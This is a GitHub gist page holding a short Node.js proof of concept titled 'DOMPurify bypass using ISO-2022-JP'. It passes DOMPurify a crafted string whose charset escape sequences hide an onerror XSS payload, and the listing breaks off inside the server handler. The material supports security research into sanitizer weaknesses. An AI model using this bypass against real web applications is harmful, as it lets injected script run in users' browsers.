Skip to content

Instantly share code, notes, and snippets.

View kevin-mizu's full-sized avatar
💭
🔎

Mizu kevin-mizu

💭
🔎
138 followers · 36 following
View GitHub Profile
@kevin-mizu
kevin-mizu / app.js
Created July 15, 2024 16:48
DOMPurify bypass using ISO-2022-JP
const createDOMPurify = require("dompurify");
const { JSDOM } = require("jsdom");
const http = require("http");
const server = http.createServer((req, res) => {
const window = new JSDOM("").window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);
res.statusCode = 200;